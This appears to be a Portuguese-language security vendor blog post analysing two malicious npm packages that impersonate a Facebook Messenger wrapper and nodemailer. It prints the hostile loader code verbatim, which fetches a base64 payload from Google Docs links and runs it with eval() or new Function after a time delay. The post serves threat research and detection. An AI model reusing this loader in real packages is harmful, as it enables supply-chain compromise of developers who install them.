Produto
Tudo o que precisa para proteger o código, a nuvem e o tempo de execução - num único sistema central
Código
Dependências
Prevenir riscos de código aberto (SCA)
Segredos
Apanhar segredos expostos
SAST
Código seguro tal como está escrito
Imagens de contentores
Proteger imagens facilmente
Malware
Prevenir ataques à cadeia de abastecimento
Infraestrutura como código
Verificar se há erros de configuração no IaC
Risco de licença e SBOMs
Evite riscos, cumpra as normas
Software desatualizado
Conheça os seus tempos de execução EOL
Nuvem
Nuvem / CSPM
Configurações incorrectas da nuvem
DAST
Testes de segurança de caixa negra
Verificação da API
Teste as suas APIs para detetar vulnerabilidades
Máquinas virtuais
Sem agentes, sem despesas gerais
Tempo de execução do Kubernetes
em breve
Proteja as suas cargas de trabalho de contentores
Inventário na nuvem
A expansão da nuvem, resolvida
Defender
Proteção em tempo de execução
Firewall na aplicação / WAF
Caraterísticas
AI AutoFix
Correcções com um clique com a IA do Aikido
Segurança CI/CD
Análise antes da fusão e da implantação
Integrações IDE
Obtenha feedback instantâneo enquanto codifica
Scanner no local
Digitalização local com prioridade à conformidade
Soluções
Casos de utilização
Conformidade
Automatize SOC 2, ISO e muito mais
Gestão de vulnerabilidades
Gestão de vulnerabilidades tudo-em-um
Proteja o seu código
Segurança de código avançada
Gerar SBOMs
1 clique Relatórios SCA
ASPM
AppSec de ponta a ponta
IA no Aikido
Deixe a IA do Aikido fazer o trabalho
Bloco 0-Dias
Bloquear ameaças antes do impacto
Indústrias
FinTech
Tecnologia da saúde
HRTech
Tecnologia jurídica
Empresas do Grupo
Agências
Startups
Empresa
Aplicações móveis
Fabrico
Preços
Recursos
Programador
Documentos
Como utilizar o Aikido
Documentos públicos da API
Centro de desenvolvimento de Aikido
Registo de alterações
Ver o que foi enviado
Segurança
Investigação interna
Informações sobre malware e CVE
Glossário
Guia do jargão de segurança
Centro de Confiança
Seguro, privado, conforme
Código aberto
Aikido Intel
Feed de ameaças de malware e OSS
Zen
Proteção da firewall na aplicação
OpenGrep
Motor de análise de código
Integrações
IDEs
Sistemas de CI/CD
Nuvens
Sistemas Git
Conformidade
Mensageiros
Gestores de tarefas
Mais integrações
Sobre
Sobre
Sobre
Conheça a equipa
Carreiras
Estamos a contratar
Kit de imprensa
Descarregar activos da marca
Calendário
Vemo-nos por aí?
Código aberto
Os nossos projectos OSS
Blogue
As últimas mensagens
Histórias de clientes
A confiança das melhores equipas
Contacto
Iniciar sessão
Comece de graça
Não é necessário CC
Aikido
Menu
Aikido
PT
PT
FR
JP
Iniciar sessão
Comece de graça
Não é necessário CC
Blogue
/
Esconder-se e falhar: Malware ofuscado, cargas úteis vazias e travessuras do npm

Esconder-se e falhar: Malware ofuscado, cargas úteis vazias e travessuras do npm

Por
Charlie Eriksen
Charlie Eriksen
4 min ler
Malware

‍

Em 14 de março de 2025, detectámos um pacote malicioso no npm chamado node-facebook-messenger-api. No início, parecia ser um malware bastante comum, embora não conseguíssemos perceber qual era o objetivo final. Não pensámos muito mais nisso até 3 de abril de 2025, quando vimos o mesmo agente de ameaça expandir o seu ataque. Esta é uma breve visão geral das técnicas utilizadas por este atacante específico, e algumas observações divertidas sobre como as suas tentativas de ofuscação acabam por torná-las ainda mais óbvias. 

‍

TLDR 

  • 🕵️ On 14 de março de 2025detectámos um pacote npm malicioso: node-facebook-messenger-api@4.1.0disfarçado de uma capa legítima do Facebook messenger.
  • O atacante escondeu-se lógica de execução remota de código utilizando áxis e eval() para obter uma carga útil de um link do Google Docs - mas o ficheiro estava vazio.
  • Versões posteriores utilizadas execução diferida no tempo e trocou o zx para evitar a deteção, incorporando lógica maliciosa que é activada dias após a publicação.
  • 📦 Ligado 3 de abril de 2025O mesmo agente de ameaças lançou um segundo pacote falso: node-smtp-mailer@6.10.0, fazendo-se passar por nodemailercom a mesma lógica e ofuscação C2.
  • 🧬 Ambos os pacotes usaram o mesmo conjunto único de dependências (incluindo hiper-tipos), revelando uma clara padrão de assinatura que ligam os ataques.
  • As tentativas de ofuscação do atacante - como esconder o código em ficheiros grandes e puxar silenciosamente o zx através de outra dependência - ironicamente tornaram a campanha mais fácil de detetar.
  • Os payloads nunca chegaram a entregar nada funcional, mas os TTPs são reais e mostram como os ataques à cadeia de abastecimento do npm estão a evoluir.
  • ‍

    Primeiros passos

    Tudo começou no dia 14 de março, às 04:37 UTC, quando os nossos sistemas nos alertaram para um pacote suspeito. Foi publicado pelo utilizador victor.ben0825, que também afirma ter o nome perusworld. Este é o nome de utilizador do utilizador que possui o repositório legítimo para esta biblioteca.  

    ‍

    Aqui está o código que detectou como sendo malicioso em node-facebook-messenger-api@4.1.0:, no ficheiro messenger.js, linha 157-177:

    const axios = require('axios');
    
    const url = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    
    async function downloadFile(url) {
        try {
            const response = await axios.get(url, {
                responseType: 'arraybuffer'
            });
    
            const fileBuffer = Buffer.from(response.data);
    		eval(Buffer.from(fileBuffer.toString('utf8'), 'base64').toString('utf8'))
            
            return fileBuffer; 
        } catch (error) {
            console.error('Download failed:', error.message);
        }
    }
    
    downloadFile(url);
    

    O atacante tentou esconder este código num ficheiro com 769 linhas, que é uma classe grande. Aqui adicionaram uma função e estão a chamá-la diretamente. Muito giro, mas também muito óbvio. Tentámos obter o payload, mas estava vazio. Marcámo-lo como malware e seguimos em frente.

    Poucos minutos depois, o atacante lançou outra versão, a 4.1.1. A única alteração parece ter sido no README.md e package.json onde alteraram a versão, a descrição e as instruções de instalação. Como marcamos o autor como um mau autor, os pacotes a partir deste ponto foram automaticamente marcados como malware.

    A tentar ser sorrateiro

    Depois, no dia 20 de março de 2025, às 16:29 UTC, o nosso sistema assinalou automaticamente a versão 4.1.2 do pacote. Vejamos o que há de novo. A primeira alteração está em node-facebook-messenger-api.js, que contém:

    "use strict";
    
    module.exports = {
        messenger: function () {
            return require('./messenger');
        },
        accountlinkHandler: function () {
            return require('./account-link-handler');
        },
        webhookHandler: function () {
            return require('./webhook-handler');
        }
    };
    
    var messengerapi = require('./messenger');

    A alteração a este ficheiro é a última linha. Não se trata apenas de importar o ficheiro messenger.js quando solicitado, é sempre feito quando o módulo é importado. Muito inteligente! A outra alteração é a desse ficheiro, messenger.js. Removeu o código adicionado anteriormente visto e adicionou o seguinte nas linhas 197 a 219:

    const timePublish = "2025-03-24 23:59:25"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
    	async function setProfile(ft) {
    		try {
    			const mod = await import('zx');
    			mod.$.verbose = false;
    			const res = await mod.fetch(ft, {redirect: 'follow'});
    			const fileBuffer = await res.arrayBuffer();
    			const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
    			const nfu = new Function("rqr", data);
    			nfu(require)();
    		} catch (error) {
    			//console.error('err:', error.message);
    		}
    	}
    
    	const gd = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    	setProfile(gd);
    }
    

    Eis um resumo do que faz:

    1. Utiliza uma verificação baseada no tempo para determinar se o código malicioso deve ser ativado. Só seria ativado cerca de 4 dias depois.
    2. Em vez de utilizar áxis, utiliza agora o Google zx para ir buscar o payload malicioso.
    3. Desactiva o modo detalhado, que é também a predefinição.
    4. De seguida, vai buscar o código malicioso
    5. Ele decodifica-o na base64
    6. Ele cria uma nova Function usando o Função() que é efetivamente equivalente a um construtor eval() chamada. 
    7. Em seguida, chama a função, passando exigir como argumento.

    ‍

    Mas, mais uma vez, quando tentamos ir buscar o ficheiro, não obtemos uma carga útil. Apenas obtemos um ficheiro vazio chamado info.txt. A utilização de zx é curioso. Olhámos para as dependências e reparámos que o pacote original continha algumas dependências:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    O pacote malicioso contém o seguinte:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    Vejam só, acrescentaram os hiper-tipos de dependência. Muito interessante, voltaremos a este assunto mais algumas vezes. 

    Eles atacam de novo!

    Depois, a 3 de abril de 2025 às 06:46, um novo pacote foi lançado pelo utilizador cristr. Lançaram oe pacote  node-smtp-mailer@6.10.0. Os nossos sistemas assinalaram-no automaticamente por conter código potencialmente malicioso. Olhámos para ele e ficámos um pouco entusiasmados. O pacote finge ser nodemailer, apenas com um nome diferente.  

    O nosso sistema assinalou o ficheiro lib/smtp-pool/index.js. Vemos rapidamente que o atacante adicionou código na parte inferior do ficheiro legítimo, mesmo antes do final módulo.exportações. Eis o que é acrescentado:

    const timePublish = "2025-04-07 15:30:00"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
        async function SMTPConfig(conf) {
            try {
                const mod = await import('zx');
                mod.$.verbose = false;
                const res = await mod.fetch(conf, {redirect: 'follow'});
                const fileBuffer = await res.arrayBuffer();
                const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
                const nfu = new Function("rqr", data);
                nfu(require)();
            } catch (error) {
                console.error('err:', error.message);
            }
        }
    
        const url = 'https://docs.google.com/uc?export=download&id=1KPsdHmVwsL9_0Z3TzAkPXT7WCF5SGhVR'; 
        SMTPConfig(url);
    }
    

    Nós conhecemos este código! Tem novamente um registo de data e hora para ser executado apenas 4 dias depois. Tentámos entusiasticamente ir buscar a carga útil, mas apenas recebemos um ficheiro vazio chamado beginner.txt. Que pena! Olhamos novamente para as dependências, para ver como estão a puxar zx. Constatámos que o legítimo nodemailer pacote tem não direto dependências, apenas devDependências. Mas eis o que está no pacote malicioso:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    Vê alguma semelhança entre este e o primeiro pacote que detectámos? É a mesma lista de dependências. O pacote legítimo não tem dependências, mas o malicioso tem. O atacante simplesmente copiou a lista completa de dependências do primeiro ataque para este. 

    ‍

    Dependências interessantes

    Então, porque é que deixaram de utilizar áxis para zx para fazer HTTP pedidos? Sem dúvida, para evitar a deteção. Mas o que é interessante é que zx não é uma dependência direta. Em vez disso, o atacante incluiu hyper-types, que é um pacote legítimo do desenvolvedor lukasbach. 

    ‍

    Para além do facto de o repositório referenciado já não existir, há algo interessante a notar aqui. Veja como há 2 dependentes? Adivinhem quem são. 

    ‍

    Se o atacante quisesse realmente tentar ofuscar sua atividade, é muito estúpido depender de um pacote do qual ele é o único dependente. 

    Palavras finais

    Embora o atacante por trás desses pacotes npm não tenha conseguido entregar uma carga útil funcional, sua campanha destaca a evolução contínua das ameaças à cadeia de suprimentos que visam o ecossistema JavaScript. O uso de execução atrasada, importações indiretas e sequestro de dependências mostra uma conscientização crescente dos mecanismos de deteção - e uma vontade de experimentar. Mas também mostra como a segurança operacional descuidada e os padrões repetidos ainda podem denunciá-los. Para os defensores, é um lembrete de que mesmo os ataques falhados são informações valiosas. Cada artefacto, truque de ofuscação e dependência reutilizada ajuda-nos a criar melhores capacidades de deteção e atribuição. E, mais importante, reforça a razão pela qual a monitorização contínua e a sinalização automática de registos de pacotes públicos já não é opcional - é fundamental.

    Escrito por Charlie Eriksen

    Investigador de malware

    Partilhar:

    https://www.aikido.dev/blog/hide-and-fail-obfuscated-malware-and-npm-shenanigan

    Índice:
    Ligação de texto
    Partilhar:
    Utilizar o teclado
    Utilizar a tecla esquerda para navegar para a página anterior do Aikido
    Utilizar a tecla de seta para a direita para navegar para o diapositivo seguinte
    para navegar pelos artigos
    Por
    Charlie Eriksen

    Está convidado: Distribuir malware através de convites do Google Calendar e PUAs

    Malware
    13 de maio de 2025
    Ler mais
    Por
    Mackenzie Jackson

    Por que atualizar imagens de base de contêineres é tão difícil (e como torná-lo mais fácil)

    Engenharia
    12 de maio de 2025
    Ler mais
    Por
    Charlie Eriksen

    RATatatouille: Uma receita maliciosa escondida no rand-user-agent (Supply Chain Compromise)

    6 de maio de 2025
    Ler mais
    Por
    Charlie Eriksen

    Ataque à cadeia de fornecimento de XRP: Pacote oficial do NPM infetado com backdoor de roubo de criptografia

    Malware
    22 de abril de 2025
    Ler mais
    Por
    Charlie Eriksen

    O guia de encontros de malware: Compreender os tipos de malware no NPM

    Malware
    10 de abril de 2025
    Ler mais
    Por
    Madeline Lawrence

    Lançamento do malware Aikido - Open Source Threat Feed

    Notícias
    31 de março de 2025
    Ler mais
    Por
    Charlie Eriksen

    Malware escondido à vista de todos: Espionagem de hackers norte-coreanos

    31 de março de 2025
    Ler mais
    Por
    A equipa de Aikido

    Principais ferramentas de gerenciamento de postura de segurança na nuvem (CSPM) em 2025

    Guias
    27 de março de 2025
    Ler mais
    Por
    Madeline Lawrence

    Obter o TL;DR: tj-actions/changed-files Ataque à cadeia de abastecimento

    Notícias
    16 de março de 2025
    Ler mais
    Por
    Mackenzie Jackson

    Uma lista de verificação de segurança do Docker sem barreiras para o programador preocupado com as vulnerabilidades

    Guias
    6 de março de 2025
    Ler mais
    Por
    Mackenzie Jackson

    Deteção e bloqueio de ataques de injeção de SQL em JavaScript

    Guias
    4 de março de 2025
    Ler mais
    Por
    Floris Van den Abeele

    Prisma e PostgreSQL vulneráveis à injeção NoSQL? Um risco de segurança surpreendente explicado

    Engenharia
    14 de fevereiro de 2025
    Ler mais
    Por
    A equipa de Aikido

    Principais ferramentas de teste de segurança de aplicativos dinâmicos (DAST) em 2025

    Guias
    12 de fevereiro de 2025
    Ler mais
    Por
    Willem Delbare

    Lançando o Opengrep | Por que fizemos o fork do Semgrep

    Notícias
    24 de janeiro de 2025
    Ler mais
    Por
    Thomas Segura

    O seu cliente necessita de correção da vulnerabilidade NIS2. E agora?

    14 de janeiro de 2025
    Ler mais
    Por
    Mackenzie Jackson

    As 10 principais ferramentas SAST com IA em 2025

    Guias
    10 de janeiro de 2025
    Ler mais
    Por
    Madeline Lawrence

    Snyk vs Aikido Security | G2 Reviews Alternativa ao Snyk

    Guias
    10 de janeiro de 2025
    Ler mais
    Por
    Mackenzie Jackson

    As 10 principais ferramentas de análise de composição de software (SCA) em 2025

    Guias
    9 de janeiro de 2025
    Ler mais
    Por
    Michiel Denis

    3 passos fundamentais para reforçar a conformidade e a gestão do risco

    27 de dezembro de 2024
    Ler mais
    Por
    Mackenzie Jackson

    O guia de código aberto da startup para segurança de aplicações

    Guias
    23 de dezembro de 2024
    Ler mais
    Por
    Madeline Lawrence

    Iniciar o Aikido para a IA do Cursor

    Engenharia
    13 de dezembro de 2024
    Ler mais
    Por
    Mackenzie Jackson

    Conheça a Intel: O feed de ameaças de código aberto do Aikido alimentado por LLMs.

    Engenharia
    13 de dezembro de 2024
    Ler mais
    Por
    Johan De Keulenaer

    Aikido junta-se à Rede de Parceiros AWS

    Notícias
    26 de novembro de 2024
    Ler mais
    Por
    Mackenzie Jackson

    Injeção de comando em 2024 descompactado

    Engenharia
    24 de novembro de 2024
    Ler mais
    Por
    Mackenzie Jackson

    Path Traversal em 2024 - O ano em aberto

    Engenharia
    23 de novembro de 2024
    Ler mais
    Por
    Mackenzie Jackson

    Equilíbrio de segurança: Quando utilizar ferramentas de código aberto vs. ferramentas comerciais

    Guias
    15 de novembro de 2024
    Ler mais
    Por
    Mackenzie Jackson

    O estado da injeção de SQL

    Guias
    8 de novembro de 2024
    Ler mais
    Por
    Michiel Denis

    O reforço da segurança da Visma com o Aikido: Uma conversa com Nikolai Brogaard

    Notícias
    6 de novembro de 2024
    Ler mais
    Por
    Michiel Denis

    Segurança em FinTech: Perguntas e respostas com Dan Kindler, cofundador e CTO da Bound

    Notícias
    10 de outubro de 2024
    Ler mais
    Por
    Félix Garriau

    As 7 principais ferramentas ASPM em 2025

    Guias
    1 de outubro de 2024
    Ler mais
    Por
    Madeline Lawrence

    Automatizar a conformidade com SprintoGRC x Aikido

    Notícias
    11 de setembro de 2024
    Ler mais
    Por
    Félix Garriau

    Como criar um SBOM para auditorias de software

    Guias
    9 de setembro de 2024
    Ler mais
    Por
    Madeline Lawrence

    SAST vs DAST: O que é preciso saber.

    Guias
    2 de setembro de 2024
    Ler mais
    Por
    Félix Garriau

    Melhores ferramentas SBOM para desenvolvedores: Nossas 2025 escolhas

    Guias
    7 de agosto de 2024
    Ler mais
    Por
    Lieven Oosterlinck

    5 alternativas ao Snyk e por que razão são melhores

    Notícias
    5 de agosto de 2024
    Ler mais
    Por
    Madeline Lawrence

    Porque é que estamos entusiasmados com a parceria com a Laravel

    Notícias
    8 de julho de 2024
    Ler mais
    Por
    Félix Garriau

    110 000 sítios afectados pelo ataque à cadeia de abastecimento Polyfill

    Notícias
    27 de junho de 2024
    Ler mais
    Por
    Félix Garriau

    Fundamentos de cibersegurança para empresas de tecnologia jurídica

    Notícias
    25 de junho de 2024
    Ler mais
    Por
    Roeland Delrue

    Integração do Drata - Como automatizar a gestão de vulnerabilidades técnicas

    Guias
    18 de junho de 2024
    Ler mais
    Por
    Joel Hans

    Guia de bricolage: "Construir ou comprar" o seu kit de ferramentas de segurança de aplicações e de digitalização de códigos OSS

    Guias
    11 de junho de 2024
    Ler mais
    Por
    Roeland Delrue

    Certificação SOC 2: 5 coisas que aprendemos

    Guias
    4 de junho de 2024
    Ler mais
    Por
    Joel Hans

    Os 10 principais problemas de segurança das aplicações e como se proteger

    Guias
    28 de maio de 2024
    Ler mais
    Por
    Madeline Lawrence

    Acabámos de angariar 17 milhões de dólares para a Série A

    Notícias
    2 de maio de 2024
    Ler mais
    Por

    As melhores ferramentas RASP para programadores em 2025

    10 de abril de 2024
    Ler mais
    Por
    Willem Delbare

    Lista de verificação da segurança do webhook: Como criar webhooks seguros

    Guias
    4 de abril de 2024
    Ler mais
    Por
    Willem Delbare

    A cura para a síndrome de fadiga dos alertas de segurança

    Engenharia
    21 de fevereiro de 2024
    Ler mais
    Por
    Roeland Delrue

    NIS2: Quem é afetado?

    Guias
    16 de janeiro de 2024
    Ler mais
    Por
    Roeland Delrue

    Certificação ISO 27001: 8 coisas que aprendemos

    Guias
    5 de dezembro de 2023
    Ler mais
    Por
    Roeland Delrue

    O Cronos Group escolhe a Aikido Security para reforçar a postura de segurança das suas empresas e clientes

    Notícias
    30 de novembro de 2023
    Ler mais
    Por
    Bart Jonckheere

    Como é que a Loctax utiliza o Aikido Security para se livrar de alertas de segurança irrelevantes e falsos positivos

    Notícias
    22 de novembro de 2023
    Ler mais
    Por
    Félix Garriau

    A Aikido Security angaria 5 milhões de euros para oferecer uma solução de segurança sem descontinuidades às empresas SaaS em crescimento

    Notícias
    9 de novembro de 2023
    Ler mais
    Por
    Roeland Delrue

    Aikido Security atinge a conformidade com a norma ISO 27001:2022

    Notícias
    8 de novembro de 2023
    Ler mais
    Por
    Félix Garriau

    Como o CTO da StoryChief usa o Aikido Security para dormir melhor à noite

    Notícias
    24 de outubro de 2023
    Ler mais
    Por
    Willem Delbare

    O que é um CVE?

    Guias
    17 de outubro de 2023
    Ler mais
    Por
    Félix Garriau

    Melhores ferramentas para deteção de fim de vida: classificações de 2025

    Guias
    4 de outubro de 2023
    Ler mais
    Por
    Willem Delbare

    As 3 principais vulnerabilidades de segurança das aplicações Web em 2024

    Engenharia
    27 de setembro de 2023
    Ler mais
    Por
    Félix Garriau

    Novas funcionalidades de segurança do Aikido: agosto de 2023

    Notícias
    22 de agosto de 2023
    Ler mais
    Por
    Félix Garriau

    Lista de verificação de segurança do CTO SaaS 2025 da Aikido

    Notícias
    10 de agosto de 2023
    Ler mais
    Por
    Félix Garriau

    Lista de verificação de segurança SaaS CTO 2024 da Aikido

    Notícias
    10 de agosto de 2023
    Ler mais
    Por
    Félix Garriau

    15 principais desafios de segurança de código e nuvem revelados pelos CTOs

    Engenharia
    25 de julho de 2023
    Ler mais
    Por
    Willem Delbare

    O que é o OWASP Top 10?

    Guias
    12 de julho de 2023
    Ler mais
    Por
    Willem Delbare

    Como criar um painel de administração seguro para a sua aplicação SaaS

    Guias
    11 de julho de 2023
    Ler mais
    Por
    Roeland Delrue

    Como se preparar para a ISO 27001:2022

    Guias
    5 de julho de 2023
    Ler mais
    Por
    Willem Delbare

    Prevenir as consequências da pirataria informática da sua plataforma CI/CD

    Guias
    19 de junho de 2023
    Ler mais
    Por
    Félix Garriau

    Como fechar negócios mais rapidamente com um relatório de avaliação de segurança

    Notícias
    12 de junho de 2023
    Ler mais
    Por
    Willem Delbare

    Automatizar a gestão de vulnerabilidades técnicas [SOC 2]

    Guias
    5 de junho de 2023
    Ler mais
    Por
    Willem Delbare

    Prevenir a poluição de protótipos no seu repositório

    Guias
    1 de junho de 2023
    Ler mais
    Por
    Willem Delbare

    Como é que um CTO de uma startup SaaS consegue equilibrar a velocidade de desenvolvimento e a segurança?

    Guias
    16 de maio de 2023
    Ler mais
    Por
    Willem Delbare

    Como a nuvem de uma startup foi dominada por um simples formulário que envia e-mails

    Engenharia
    10 de abril de 2023
    Ler mais
    Por
    Félix Garriau

    A Aikido Security angaria 2 milhões de euros de pré-semente para criar uma plataforma de segurança de software para programadores

    Notícias
    19 de janeiro de 2023
    Ler mais
    Por

    Porque é que os ficheiros de bloqueio são importantes para a segurança da cadeia de abastecimento

    Ler mais
    Principais ferramentas de gerenciamento de postura de segurança na nuvem (CSPM) em 2025
    Por
    A equipa de Aikido

    Principais ferramentas de gerenciamento de postura de segurança na nuvem (CSPM) em 2025

    Guias
    14 de maio de 2025
    Principais ferramentas de teste de segurança de aplicativos dinâmicos (DAST) em 2025
    Por
    A equipa de Aikido

    Principais ferramentas de teste de segurança de aplicativos dinâmicos (DAST) em 2025

    Guias
    14 de maio de 2025
    Ataque à cadeia de fornecimento de XRP: Pacote oficial do NPM infetado com backdoor de roubo de criptografia
    Por
    Charlie Eriksen

    Ataque à cadeia de fornecimento de XRP: Pacote oficial do NPM infetado com backdoor de roubo de criptografia

    Malware
    31 de março de 2025

    Obter segurança em 32 segundos

    Ligue a sua conta GitHub, GitLab, Bitbucket ou Azure DevOps para começar a analisar os seus repositórios gratuitamente.

    Comece de graça
    Os seus dados não serão partilhados - Acesso só de leitura
    Painel de controlo do Aikido
    Empresa
    ProdutoPreçosSobreCarreirasContactoSeja nosso parceiro
    Recursos
    DocumentosDocumentos públicos da APIBase de dados de vulnerabilidadesBlogueIntegraçõesGlossárioKit de imprensaComentários de clientes
    Segurança
    Centro de ConfiançaVisão geral da segurançaAlterar as preferências de cookies
    Jurídico
    Política de privacidadePolítica de cookiesTermos de utilizaçãoContrato Principal de SubscriçãoAcordo de processamento de dados
    Casos de utilização
    ConformidadeSAST E DASTASPMGestão de vulnerabilidadesGerar SBOMsSegurança do WordPressProteja o seu códigoAikido para a Microsoft
    Indústrias
    Para a HealthTechPara a MedTechPara a FinTechPara SecurityTechPara a LegalTechPara HRTechPara as agênciasPara empresasPara empresas de capital de risco e de grupo
    Comparar
    vs Todos os fornecedorescontra Snykcontra Wizvs Mendvs Orca Securityvs Veracodevs Segurança avançada do GitHubvs GitLab Ultimatevs Checkmarxvs Semgrepvs SonarQube
    Ligar
    hello@aikido.dev
    LinkedInX
    Subscrever
    Mantenha-se a par de todas as actualizações
    Ainda não é o caso.
    👋🏻 Obrigado! Está inscrito.
    Equipa de Aikido
    Ainda não é o caso.
    © 2025 Aikido Security BV | BE0792914919
    🇪🇺 Endereço registado: Coupure Rechts 88, 9000, Ghent, Bélgica
    🇪🇺 Endereço do escritório: Gebroeders van Eyckstraat 2, 9000, Ghent, Bélgica
    🇺🇸 Endereço do escritório: 95 Third St, 2nd Fl, São Francisco, CA 94103, EUA
    SOC 2
    Conformidade
    ISO 27001
    Conformidade